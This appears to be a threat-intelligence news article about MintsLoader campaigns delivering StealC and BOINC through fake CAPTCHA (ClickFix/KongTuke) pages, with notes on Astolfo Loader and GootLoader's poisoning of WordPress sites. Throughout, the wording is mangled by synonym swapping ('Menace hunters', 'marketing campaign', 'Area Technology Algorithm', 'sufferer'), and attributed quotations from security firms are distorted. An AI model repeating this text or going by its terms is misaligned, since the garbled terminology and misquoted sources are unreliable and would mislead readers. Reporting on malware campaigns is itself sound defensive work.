Menace hunters have detailed an ongoing marketing campaign that leverages a malware loader known as MintsLoader to distribute secondary payloads such because the StealC info stealer and a legit open-source community computing platform known as BOINC.
“MintsLoader is a PowerShell primarily based malware loader that has been seen delivered by way of spam emails with a hyperlink to Kongtuke/ClickFix pages or a JScript file,” cybersecurity agency eSentire stated in an evaluation.
The marketing campaign has focused electrical energy, oil and fuel, and the authorized companies sectors in the US and Europe, per the corporate, which detected the exercise in early January 2025.
The event comes amid a spike in malicious campaigns which are abusing pretend CAPTCHA verification prompts to trick customers into copying and executing PowerShell scripts to get across the checks, a method that has come to be recognized ClickFix and KongTuke.
“KongTuke includes an injected script that at the moment causes related web sites to show pretend ‘confirm you’re human’ pages,” Palo Alto Networks Unit 42 stated in a report detailing an analogous marketing campaign distributing BOINC.
“These pretend verification pages load a possible sufferer’s Home windows copy/paste buffer with malicious PowerShell script. The web page additionally offers detailed directions asking potential victims to stick and execute the script in a Run window.”
The assault chain documented by eSentire begins when customers click on on a hyperlink in a spam electronic mail, resulting in the obtain of an obfuscated JavaScript file. The script is accountable for working a PowerShell command to obtain MintsLoader by way of curl and execute it, after which it deletes itself from the host to keep away from leaving traces.
Alternate sequences redirect the message recipients to ClickFix-style pages that result in the supply of MintsLoader by the use of the Home windows Run immediate.
The loader malware, in flip, contacts a command-and-control (C2) server to fetch interim PowerShell payloads that performs numerous checks to evade sandboxes and resist evaluation efforts. It additionally contains a Area Technology Algorithm (DGA) with a seed worth primarily based on the addition of the present day of the month to create the C2 area title.
The assault culminates with the deployment of StealC, an info stealer bought below the malware-as-a-service (MaaS) mannequin since early 2023. It is assessed to be re-engineered from one other stealer malware often called Arkei. One of many notable options of the malware is its capacity to keep away from infecting machines positioned in Russia, Ukraine, Belarus, Kazakhstan, or Uzbekistan.
Information of the MintsLoader marketing campaign additionally follows the emergence of an up to date model of the JinxLoader dubbed Astolfo Loader (aka Jinx V3) that has been rewritten in C++ possible for efficiency causes after its supply code was bought off by the malware writer Rendnza to 2 separate consumers Delfin and AstolfoLoader.
“Whereas @Delfin claims to be promoting JinxLoaderV2 unchanged, @AstolfoLoader opted to rebrand the malware and modify the stub to C++ (Jinx V3), as a substitute of utilizing the unique Go-compiled binary,” BlackBerry famous late final 12 months.
“Companies like JinxLoader and its successor, Astolfo Loader (Jinx V3), exemplify how such instruments can proliferate rapidly and affordably and might be bought by way of common public hacking boards which are accessible to just about anybody with an Web connection.”
Cybersecurity researchers have additionally make clear the internal workings of the GootLoader malware campaigns, that are recognized to weaponize SEO (search engine optimisation) poisoning to redirect victims trying to find agreements and contracts to compromised WordPress websites that host a realistic-looking message board to obtain a file that incorporates what they’re purportedly on the lookout for.
The malware operators have been discovered to make adjustments to the WordPress websites that trigger these websites to dynamically load the pretend discussion board web page content material from one other server, known as the “mothership” by Sophos.
GootLoader campaigns, in addition to geofencing IP handle ranges and permitting requests to originate from particular nations of curiosity, go additional by allowing the potential sufferer to go to the contaminated web site solely as soon as in 24 hours by including the IP to a block listing.
“Each side of this course of is obfuscated to such a level that even the house owners of the compromised WordPress pages usually can’t determine the modifications in their very own web site or set off the GootLoader code to run after they go to their very own pages,” safety researcher Gabor Szappanos stated.
